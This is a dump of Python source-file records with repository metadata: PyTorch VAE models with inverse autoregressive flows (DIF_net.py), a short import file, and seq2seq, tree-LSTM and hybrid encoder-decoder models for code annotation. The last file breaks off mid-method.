6fb95af500ac2115f3b94cb0e61e6909cff1a983
| 5,553
|
py
|
Python
|
models/DIF_net.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
models/DIF_net.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
models/DIF_net.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
from models.networks import IntroVAE
from IAF.IAF import IAF_flow
import torch
from models.networks_v2 import *
from IAF.layers.utils import accumulate_kl_div, reset_kl_div
class DIF_net(IntroVAE):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_net, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(std)
z = eps.mul(std).add_(mu)
if self.tanh_flag:
return self.C*torch.tanh(z/self.C)
else:
return z
def sample(self,z):
if self.tanh_flag:
return self.decode(self.C * torch.tanh(z / self.C))
else:
return self.decode(z)
def sample_fake_eval(self,n):
z = torch.randn(n,self.hdim).cuda()
return self.sample(z)
def get_latent(self,x):
mu, logvar = self.encode(x)
z = self.reparameterize(mu, logvar)
return z
class DIF_net_flow(IntroVAE):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_net_flow, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
self.flow = IAF_flow(hdim,flow_depth,tanh_flag,flow_C)
def forward(self, x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
y = self.decode(z)
return mu, logvar, z, y, flow_log_det,xi
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(mu)
xi = eps.mul(std).add_(mu)
z,log_det = self.flow(xi,logvar)
return xi,z,log_det
def flow_forward_only(self,xi,logvar=None):
output,_ = self.flow(xi, logvar)
return output
def encode_and_flow(self,x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
return mu, logvar, z, flow_log_det,xi
def get_latent(self,x):
return self.encode_and_flow(x)
def sample(self,xi,logvar):
with torch.no_grad():
z,_ = self.flow(xi,logvar)
return self.decode(z.detach())
def sample_fake_eval(self, n):
z = torch.randn(n, self.hdim).cuda()
logvar = torch.zeros_like(z)
return self.sample(z,logvar)
class DIF_netv2(IntroVAEv2):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_netv2, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(std)
z = eps.mul(std).add_(mu)
if self.tanh_flag:
return self.C*torch.tanh(z/self.C)
else:
return z
def sample(self,z):
if self.tanh_flag:
return self.decode(self.C * torch.tanh(z / self.C))
else:
return self.decode(z)
def sample_fake_eval(self,n):
z = torch.randn(n,self.hdim).cuda()
return self.sample(z)
def get_latent(self,x):
mu, logvar = self.encode(x)
z = self.reparameterize(mu, logvar)
return z
class DIF_net_flow_v2(IntroVAEv2):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_net_flow, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
self.flow = IAF_flow(hdim,flow_depth,tanh_flag,flow_C)
def forward(self, x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
y = self.decode(z)
return mu, logvar, z, y, flow_log_det,xi
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(mu)
xi = eps.mul(std).add_(mu)
z,log_det = self.flow(xi,logvar)
return xi,z,log_det
def flow_forward_only(self,xi,logvar=None):
output,_ = self.flow(xi, logvar)
return output
def encode_and_flow(self,x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
return mu, logvar, z, flow_log_det,xi
def get_latent(self,x):
return self.encode_and_flow(x)
def sample(self,xi,logvar):
with torch.no_grad():
z,_ = self.flow(xi,logvar)
return self.decode(z.detach())
def sample_fake_eval(self, n):
z = torch.randn(n, self.hdim).cuda()
logvar = torch.zeros_like(z)
return self.sample(z,logvar)
| 30.679558
| 106
| 0.570863
| 782
| 5,553
| 3.845269
| 0.102302
| 0.053209
| 0.031926
| 0.025939
| 0.9428
| 0.9428
| 0.9428
| 0.9428
| 0.9428
| 0.9428
| 0
| 0.033062
| 0.313704
| 5,553
| 181
| 107
| 30.679558
| 0.75597
| 0
| 0
| 0.92517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176871
| false
| 0
| 0.034014
| 0.013605
| 0.414966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6feb17a612343c1502c60175ffd32cedf39f7e6e
| 75
|
py
|
Python
|
agents/common/__init__.py
|
ksang/Voigt-Kampff
|
21f9ad172e5edf0fe50479eba816413f477b4c70
|
[
"MIT"
] | 3
|
2018-07-28T09:21:45.000Z
|
2020-04-11T15:01:12.000Z
|
agents/common/__init__.py
|
ksang/Voigt-Kampff
|
21f9ad172e5edf0fe50479eba816413f477b4c70
|
[
"MIT"
] | null | null | null |
agents/common/__init__.py
|
ksang/Voigt-Kampff
|
21f9ad172e5edf0fe50479eba816413f477b4c70
|
[
"MIT"
] | null | null | null |
from agents.common.model import Linear
from agents.common.model import CNN
| 25
| 38
| 0.84
| 12
| 75
| 5.25
| 0.583333
| 0.31746
| 0.507937
| 0.666667
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 2
| 39
| 37.5
| 0.940299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
6ff57e855e36be170e538a562c47da7085f367a1
| 34,531
|
py
|
Python
|
code/code_annotation/lib/model/EncoderDecoder.py
|
sunlab-osu/CoaCor
|
e5df8fd38830590b9f132dd68bc26c630e41e509
|
[
"Apache-2.0"
] | 30
|
2019-03-08T05:11:32.000Z
|
2021-12-09T12:11:29.000Z
|
code/code_annotation/lib/model/EncoderDecoder.py
|
sunlab-osu/CoaCor
|
e5df8fd38830590b9f132dd68bc26c630e41e509
|
[
"Apache-2.0"
] | 1
|
2020-04-18T14:46:48.000Z
|
2020-06-17T20:08:37.000Z
|
code/code_annotation/lib/model/EncoderDecoder.py
|
sunlab-osu/CoaCor
|
e5df8fd38830590b9f132dd68bc26c630e41e509
|
[
"Apache-2.0"
] | 4
|
2019-07-02T05:25:11.000Z
|
2021-05-27T12:52:21.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
# import gensim
import numpy as np
import lib
import sys
import re
import pdb
class Encoder_W2V(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
super(Encoder_W2V, self).__init__()
# self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
self.rnn = nn.LSTM(opt.word_vec_size, self.hidden_size, num_layers=opt.layers, dropout=opt.dropout, bidirectional=opt.brnn)
self.dicts = dicts
self.opt = opt
def embedding(self, input):
emb = []
for i in range(input.shape[0]):
emb_row = []
for w in self.dicts.convertToLabels(input[i].tolist(), lib.Constants.UNK_WORD):
try:
emb_row.append(self.embeddings.wv[w].astype(float))
except:
emb_row.append(np.zeros((self.opt.word_vec_size), dtype=float))
emb.append(emb_row)
emb = torch.Tensor(emb)
if self.opt.gpus:
emb = emb.cuda()
# print "decoder-emb: "
# print emb
return emb
def forward(self, inputs, hidden=None):
input = inputs[0].data.cpu().numpy()
emb = self.embedding(input)
emb = pack(emb, inputs[1])
outputs, hidden_t = self.rnn(emb, hidden)
outputs = unpack(outputs)[0]
return hidden_t, outputs
class Encoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
super(Encoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.rnn = nn.LSTM(opt.word_vec_size, self.hidden_size, dropout=opt.dropout,
num_layers=opt.layers, bidirectional=opt.brnn)
self.dicts = dicts
self.opt = opt
def forward(self, inputs, hidden=None):
emb = pack(self.word_lut(inputs[0]), inputs[1])
outputs, hidden_t = self.rnn(emb, hidden)
outputs = unpack(outputs)[0]
return hidden_t, outputs
class StackedLSTM(nn.Module):
def __init__(self, num_layers, input_size, rnn_size, dropout):
super(StackedLSTM, self).__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
self.layers = nn.ModuleList()
for i in range(num_layers):
self.layers.append(nn.LSTMCell(input_size, rnn_size))
input_size = rnn_size
def forward(self, inputs, hidden):
h_0, c_0 = hidden
h_1, c_1 = [], []
for i, layer in enumerate(self.layers):
h_1_i, c_1_i = layer(inputs, (h_0[i], c_0[i]))
inputs = h_1_i
if i != self.num_layers:
inputs = self.dropout(inputs)
h_1 += [h_1_i]
c_1 += [c_1_i]
h_1 = torch.stack(h_1)
c_1 = torch.stack(c_1)
return inputs, (h_1, c_1)
class BinaryTreeLeafModule(nn.Module):
def __init__(self, cuda, in_dim, mem_dim):
super(BinaryTreeLeafModule, self).__init__()
self.cudaFlag = cuda
self.in_dim = in_dim
self.mem_dim = mem_dim
self.cx = nn.Linear(self.in_dim, self.mem_dim)
self.ox = nn.Linear(self.in_dim, self.mem_dim)
if self.cudaFlag:
self.cx = self.cx.cuda()
self.ox = self.ox.cuda()
def forward(self, input):
c = self.cx(input)
o = F.sigmoid(self.ox(input))
h = o * F.tanh(c)
return h, (c, h)
class BinaryTreeComposer(nn.Module):
def __init__(self, cuda, in_dim, mem_dim, gate_output=False):
super(BinaryTreeComposer, self).__init__()
self.cudaFlag = cuda
self.in_dim = in_dim
self.mem_dim = mem_dim
self.gate_output = gate_output
def new_gate():
lh = nn.Linear(self.mem_dim, self.mem_dim)
rh = nn.Linear(self.mem_dim, self.mem_dim)
return lh, rh
self.ilh, self.irh = new_gate()
self.lflh, self.lfrh = new_gate()
self.rflh, self.rfrh = new_gate()
self.ulh, self.urh = new_gate()
if self.cudaFlag:
self.ilh = self.ilh.cuda()
self.irh = self.irh.cuda()
self.lflh = self.lflh.cuda()
self.lfrh = self.lfrh.cuda()
self.rflh = self.rflh.cuda()
self.rfrh = self.rfrh.cuda()
self.ulh = self.ulh.cuda()
self.urh = self.urh.cuda()
if self.gate_output:
self.olh, self.orh = new_gate()
if self.cudaFlag:
self.olh = self.olh.cuda()
self.orh = self.orh.cuda()
def forward(self, lc, lh , rc, rh):
i = F.sigmoid(self.ilh(lh) + self.irh(rh))
lf = F.sigmoid(self.lflh(lh) + self.lfrh(rh))
rf = F.sigmoid(self.rflh(lh) + self.rfrh(rh))
update = F.tanh(self.ulh(lh) + self.urh(rh))
c = i* update + lf*lc + rf*rc
if self.gate_output:
o = F.sigmoid(self.olh(lh) + self.orh(rh))
h = o*F.tanh(c)
else:
h = F.tanh(c)
return c, h
class TreeEncoder_W2V(nn.Module):
def __init__(self, opt, dicts):
super(TreeEncoder_W2V, self).__init__()
self.layers = opt.layers
self.opt = opt
self.dicts = dicts
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
# self.embeddings = Embeddings(opt, dicts)
self.input_size = self.opt.word_vec_size #self.embeddings.embedding_size #100
if len(self.opt.gpus) >= 1:
self.cudaFlag = True
else:
self.cudaFlag = False
self.leaf_module = BinaryTreeLeafModule(self.cudaFlag, self.input_size, self.hidden_size)
self.composer = BinaryTreeComposer(self.cudaFlag, self.input_size, self.hidden_size)
def forward(self, tree, lengths):
if not tree.children:
try:
node = torch.Tensor(self.embeddings.wv[tree.content]).unsqueeze(0)
except:
node = torch.zeros(1, self.input_size)
if self.cudaFlag:
node = node.cuda()
# node = self.embeddings(Variable(torch.LongTensor([self.dicts.lookup(tree.content, onmt.Constants.UNK)]).unsqueeze(1)).cuda())
# node.data.squeeze_(1)
# print "node: ", node.size()
# print node
# output, state = self.leaf_module.forward(Variable(node, requires_grad=True))
output, state = self.leaf_module.forward(torch.Tensor(node, requires_grad=True))
elif tree.children:
# for idx in xrange(tree.num_children):
lo, (lc, lh) = self.forward(tree.children[0], lengths)
ro, (rc, rh) = self.forward(tree.children[1], lengths)
# lc, lh, lo, rc, rh, ro = self.get_child_state(tree)
state = self.composer.forward(lc, lh, rc, rh)
output = torch.cat([lo, ro])
# del lc, lh, lo, rc, rh, ro
if not tree.parent:
# max_length = int(torch.max(lengths.data))
max_length = np.max(lengths)
output.data.unsqueeze_(1)
supl = max_length - output.size()[0]
if supl > 0:
output.data = torch.cat([output.data, torch.zeros((supl, output.size()[1], output.size()[2])).cuda()], 0)
state[0].data.unsqueeze_(1)
state[1].data.unsqueeze_(1)
return output, state
# def get_child_state(self, tree):
# lc, lh = tree.children[0].state
# lo = tree.children[0].output
# rc, rh = tree.children[1].state
# ro = tree.children[1].output
# return lc, lh, lo, rc, rh, ro
class TreeEncoder(nn.Module):
def __init__(self, opt, dicts):
super(TreeEncoder, self).__init__()
self.layers = opt.layers
self.opt = opt
self.dicts = dicts
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
# self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.input_size = self.opt.word_vec_size #self.embeddings.embedding_size #100
if len(self.opt.gpus) >= 1:
self.cudaFlag = True
else:
self.cudaFlag = False
self.leaf_module = BinaryTreeLeafModule(self.cudaFlag, self.input_size, self.hidden_size)
self.composer = BinaryTreeComposer(self.cudaFlag, self.input_size, self.hidden_size)
def forward(self, tree, lengths):
if not tree.children:
# try:
# node = torch.Tensor(self.embeddings.wv[tree.content]).unsqueeze(0)
# except:
# node = torch.zeros(1, self.input_size)
# if self.cudaFlag:
# node = node.cuda()
# node = self.word_lut(Variable(torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)])).cuda())
node = self.word_lut(
torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)]).cuda())
output, state = self.leaf_module.forward(node) # Variable(node, requires_grad=True)
elif tree.children:
# for idx in xrange(tree.num_children):
lo, (lc, lh) = self.forward(tree.children[0], lengths)
ro, (rc, rh) = self.forward(tree.children[1], lengths)
# lc, lh, lo, rc, rh, ro = self.get_child_state(tree)
state = self.composer.forward(lc, lh, rc, rh)
output = torch.cat([lo, ro])
# del lc, lh, lo, rc, rh, ro
if not tree.parent:
# max_length = int(torch.max(lengths.data))
max_length = np.max(lengths)
output.data.unsqueeze_(1)
supl = max_length - output.size()[0]
if supl > 0:
output.data = torch.cat([output.data, torch.zeros((supl, output.size()[1], output.size()[2])).cuda()], 0)
state[0].data.unsqueeze_(1)
state[1].data.unsqueeze_(1)
return output, state
# def get_child_state(self, tree):
# lc, lh = tree.children[0].state
# lo = tree.children[0].output
# rc, rh = tree.children[1].state
# ro = tree.children[1].output
# return lc, lh, lo, rc, rh, ro
class HybridEncoder(nn.Module):
def __init__(self, opt, dicts):
super(HybridEncoder, self).__init__()
self.layers = opt.layers
self.opt = opt
self.dicts = dicts
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
# self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.input_size = self.opt.word_vec_size #self.embeddings.embedding_size #100
if len(self.opt.gpus) >= 1:
self.cudaFlag = True
else:
self.cudaFlag = False
self.leaf_module = BinaryTreeLeafModule(self.cudaFlag, self.input_size, self.hidden_size)
self.composer = BinaryTreeComposer(self.cudaFlag, self.input_size, self.hidden_size)
def forward(self, tree, lengths):
if not tree.children:
# node = self.word_lut(Variable(torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)])).cuda())
node = self.word_lut(
torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)]).cuda())
output, state = self.leaf_module.forward(node) # Variable(node, requires_grad=True)
elif tree.children:
# for idx in xrange(tree.num_children):
lo, (lc, lh) = self.forward(tree.children[0], lengths)
ro, (rc, rh) = self.forward(tree.children[1], lengths)
# lc, lh, lo, rc, rh, ro = self.get_child_state(tree)
state = self.composer.forward(lc, lh, rc, rh)
output = torch.cat([lo, ro])
# del lc, lh, lo, rc, rh, ro
if not tree.parent:
# max_length = int(torch.max(lengths.data))
max_length = np.max(lengths)
output.data.unsqueeze_(1)
supl = max_length - output.size()[0]
if supl > 0:
output.data = torch.cat([output.data, torch.zeros((supl, output.size()[1], output.size()[2])).cuda()], 0)
state[0].data.unsqueeze_(1)
state[1].data.unsqueeze_(1)
return output, state
class TreeDecoder_W2V(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(TreeDecoder_W2V, self).__init__()
# self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.comment.gz')
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
if opt.has_attn:
self.attn = lib.GlobalAttention(opt.rnn_size)
self.dropout = nn.Dropout(opt.dropout)
self.hidden_size = opt.rnn_size
self.opt = opt
self.dicts = dicts
def embedding(self, input):
# print "emb-input: "
# print input
emb = []
for i in range(input.shape[0]):
emb_row = []
for w in self.dicts.convertToLabels(input[i].tolist(), lib.Constants.UNK_WORD):
try:
emb_row.append(self.embeddings.wv[w].astype(float))
except:
emb_row.append(np.zeros((self.opt.word_vec_size), dtype=float))
emb.append(emb_row)
emb = torch.Tensor(emb)
if self.opt.gpus:
emb = emb.cuda()
# print "decoder-emb: "
# print emb
return emb
def step(self, emb, output, hidden, context):
if self.input_feed:
emb = torch.cat([emb, output], 1)
output, hidden = self.rnn(emb, hidden)
# print "decoder-output: "
# print output
# print "decoder-context: "
# print context
if self.opt.has_attn:
output, attn = self.attn(output, context)
output = self.dropout(output)
return output, hidden
def forward(self, inputs, init_states):
emb, output, hidden, context = init_states
# print "decoder-inputs: "
# print inputs
# embs = self.word_lut(inputs)
# print "decoder-embs: "
# print embs
input = inputs.data.cpu().numpy()
embs = self.embedding(input)
outputs = []
for i in range(inputs.size(0)):
output, hidden = self.step(emb, output, hidden, context)
outputs.append(output)
emb = embs[i]
outputs = torch.stack(outputs)
return outputs
class TreeDecoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(TreeDecoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
if opt.has_attn:
self.attn = lib.GlobalAttention(opt.rnn_size)
self.dropout = nn.Dropout(opt.dropout)
self.hidden_size = opt.rnn_size
self.opt = opt
def step(self, emb, output, hidden, context):
if self.input_feed:
emb = torch.cat([emb, output], 1)
output, hidden = self.rnn(emb, hidden)
if self.opt.has_attn:
output, attn = self.attn(output, context)
output = self.dropout(output)
return output, hidden
def forward(self, inputs, init_states):
emb, output, hidden, context = init_states
embs = self.word_lut(inputs)
outputs = []
for i in range(inputs.size(0)):
output, hidden = self.step(emb, output, hidden, context)
outputs.append(output)
emb = embs[i]
outputs = torch.stack(outputs)
return outputs
class HybridDecoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(HybridDecoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
if opt.has_attn:
# self.text_attn = lib.GlobalAttention(opt.rnn_size)
self.attn = lib.HybridAttention(opt.rnn_size)
else:
self.linear_out = nn.Linear(opt.rnn_size * 2, opt.rnn_size, bias=False)
self.dropout = nn.Dropout(opt.dropout)
self.hidden_size = opt.rnn_size
self.opt = opt
def step(self, emb, output, hidden_tree, context_tree, hidden_txt, context_txt):
if self.input_feed:
emb = torch.cat([emb, output], 1)
output_tree, hidden_tree = self.rnn(emb, hidden_tree)
output_txt, hidden_txt = self.rnn(emb, hidden_txt)
if self.opt.has_attn:
output, attn_tree, attn_txt = self.attn(output_tree, context_tree, output_txt, context_txt)
else:
output = self.linear_out(torch.cat((output_tree, output_txt), 1))
output = self.dropout(output)
return output, hidden_tree, hidden_txt
def forward(self, inputs, init_states):
emb, output, hidden_tree, context_tree, hidden_txt, context_txt = init_states
embs = self.word_lut(inputs)
outputs = []
for i in range(inputs.size(0)):
output, hidden_tree, hidden_txt = self.step(emb, output, hidden_tree, context_tree, hidden_txt, context_txt)
outputs.append(output)
emb = embs[i]
outputs = torch.stack(outputs)
return outputs
class Hybrid2SeqModel(nn.Module):
def __init__(self, code_encoder, text_encoder, decoder, generator, opt):
super(Hybrid2SeqModel, self).__init__()
self.code_encoder = code_encoder
self.text_encoder = text_encoder
self.decoder = decoder
self.generator = generator
self.opt = opt
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
# return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
return torch.zeros(*h_size, dtype=context.data.dtype, requires_grad=False)
def initialize(self, inputs, eval):
tgt = inputs[2]
trees = inputs[1][0]
lengths = inputs[1][1]
src_txt = inputs[0]
enc_context_padded_tree, enc_hidden_tree0, enc_hidden_tree1 = [], [], []
# code encoder
for i, tree in enumerate(trees):
enc_ctx_txt, enc_hidden_tree = self.code_encoder(tree, lengths) # enc_contex <=> outputs
enc_context_padded_tree.append(enc_ctx_txt)
enc_hidden_tree0.append(enc_hidden_tree[0])
enc_hidden_tree1.append(enc_hidden_tree[1])
enc_context_padded_tree = torch.cat(enc_context_padded_tree, 1)
enc_hidden_tree = (torch.cat(enc_hidden_tree0, 1), torch.cat(enc_hidden_tree1, 1))
enc_hidden_txt, enc_context_txt = self.text_encoder(src_txt)
init_output = self.make_init_decoder_output(enc_context_txt)
# init_token = Variable(torch.LongTensor([lib.Constants.BOS] * init_output.size(0)), volatile=eval)
init_token = torch.LongTensor([lib.Constants.BOS] * init_output.size(0))
if self.opt.cuda:
init_token = init_token.cuda()
emb = self.decoder.word_lut(init_token)
return tgt, (emb, init_output, enc_hidden_tree, enc_context_padded_tree.transpose(0, 1), enc_hidden_txt, enc_context_txt.transpose(0,1))
def forward(self, inputs, eval, regression=False):
targets, init_states = self.initialize(inputs, eval)
outputs = self.decoder(targets, init_states)
if regression:
logits = self.generator(outputs)
return logits.view_as(targets)
return outputs
def backward(self, outputs, targets, weights, normalizer, criterion, regression=False):
grad_output, loss = self.generator.backward(outputs, targets, weights, normalizer, criterion, regression)
outputs.backward(grad_output)
return loss
def predict(self, outputs, targets, weights, criterion):
return self.generator.predict(outputs, targets, weights, criterion)
def translate(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=True)
# emb, output, hidden, context = init_states
emb, output, hidden_tree, context_tree, hidden_txt, context_txt = init_states
preds = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
# output, hidden = self.decoder.step(emb, output, hidden, context)
output, hidden_tree, hidden_txt = self.decoder.step(emb, output, hidden_tree, context_tree, hidden_txt, context_txt)
logit = self.generator(output)
pred = logit.max(1)[1].view(-1).data
preds.append(pred)
# Stop if all sentences reach EOS.
num_eos |= (pred == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(pred))
emb = self.decoder.word_lut(pred)
preds = torch.stack(preds)
return preds
def sample(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=False)
emb, output, hidden_tree, context_tree, hidden_txt, context_txt = init_states
outputs = []
samples = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
# output, hidden = self.decoder.step(emb, output, hidden, context)
output, hidden_tree, hidden_txt = self.decoder.step(emb, output, hidden_tree, context_tree, hidden_txt, context_txt)
outputs.append(output)
dist = F.softmax(self.generator(output))
sample = dist.multinomial(1, replacement=False).view(-1).data
samples.append(sample)
# Stop if all sentences reach EOS.
num_eos |= (sample == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(sample))
emb = self.decoder.word_lut(sample)
outputs = torch.stack(outputs)
samples = torch.stack(samples)
return samples, outputs
class Tree2SeqModel(nn.Module):
def __init__(self, encoder, decoder, generator, opt):
super(Tree2SeqModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.generator = generator
self.opt = opt
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
# return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
return torch.zeros(*h_size, dtype=context.data.dtype, requires_grad=False)
def _fix_enc_hidden(self, h):
# the encoder hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
if self.encoder.num_directions == 2:
return h.view(h.size(0) // 2, 2, h.size(1), h.size(2)) \
.transpose(1, 2).contiguous() \
.view(h.size(0) // 2, h.size(1), h.size(2) * 2)
else:
return h
def initialize(self, inputs, eval):
# src = inputs[2]
tgt = inputs[2]
# trees = inputs[4][0]
# lengths = inputs[4][1]
trees = inputs[1][0]
lengths = inputs[1][1]
# lengths = [tree.leaf_count() for tree in trees]
enc_context_padded, enc_hidden0, enc_hidden1 = [], [], []
# print "tree_lengths: ", lengths
for i, tree in enumerate(trees):# encoding trees ONE BY ONE
enc_ctx, enc_hidden = self.encoder(tree, lengths) # enc_contex <=> outputs
enc_context_padded.append(enc_ctx)
enc_hidden0.append(enc_hidden[0])
enc_hidden1.append(enc_hidden[1])
# print "enc_context_padded: "
# print enc_context_padded
enc_context_padded = torch.cat(enc_context_padded, 1)
enc_hidden = (torch.cat(enc_hidden0, 1), torch.cat(enc_hidden1, 1))
init_output = self.make_init_decoder_output(enc_context_padded)
enc_hidden = (self._fix_enc_hidden(enc_hidden[0]), self._fix_enc_hidden(enc_hidden[1]))
# init_token = Variable(torch.LongTensor([lib.Constants.BOS] * init_output.size(0)), volatile=eval)
init_token = torch.LongTensor([lib.Constants.BOS] * init_output.size(0))
if self.opt.cuda:
init_token = init_token.cuda()
emb = self.decoder.word_lut(init_token)
return tgt, (emb, init_output, enc_hidden, enc_context_padded.transpose(0, 1))
def forward(self, inputs, eval, regression=False):
targets, init_states = self.initialize(inputs, eval)
outputs = self.decoder(targets, init_states)
if regression:
logits = self.generator(outputs)
return logits.view_as(targets)
return outputs
def backward(self, outputs, targets, weights, normalizer, criterion, regression=False):
grad_output, loss = self.generator.backward(outputs, targets, weights, normalizer, criterion, regression)
outputs.backward(grad_output)
return loss
def predict(self, outputs, targets, weights, criterion):
return self.generator.predict(outputs, targets, weights, criterion)
def translate(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=True)
emb, output, hidden, context = init_states
preds = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
logit = self.generator(output)
pred = logit.max(1)[1].view(-1).data
preds.append(pred)
# Stop if all sentences reach EOS.
num_eos |= (pred == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(pred))
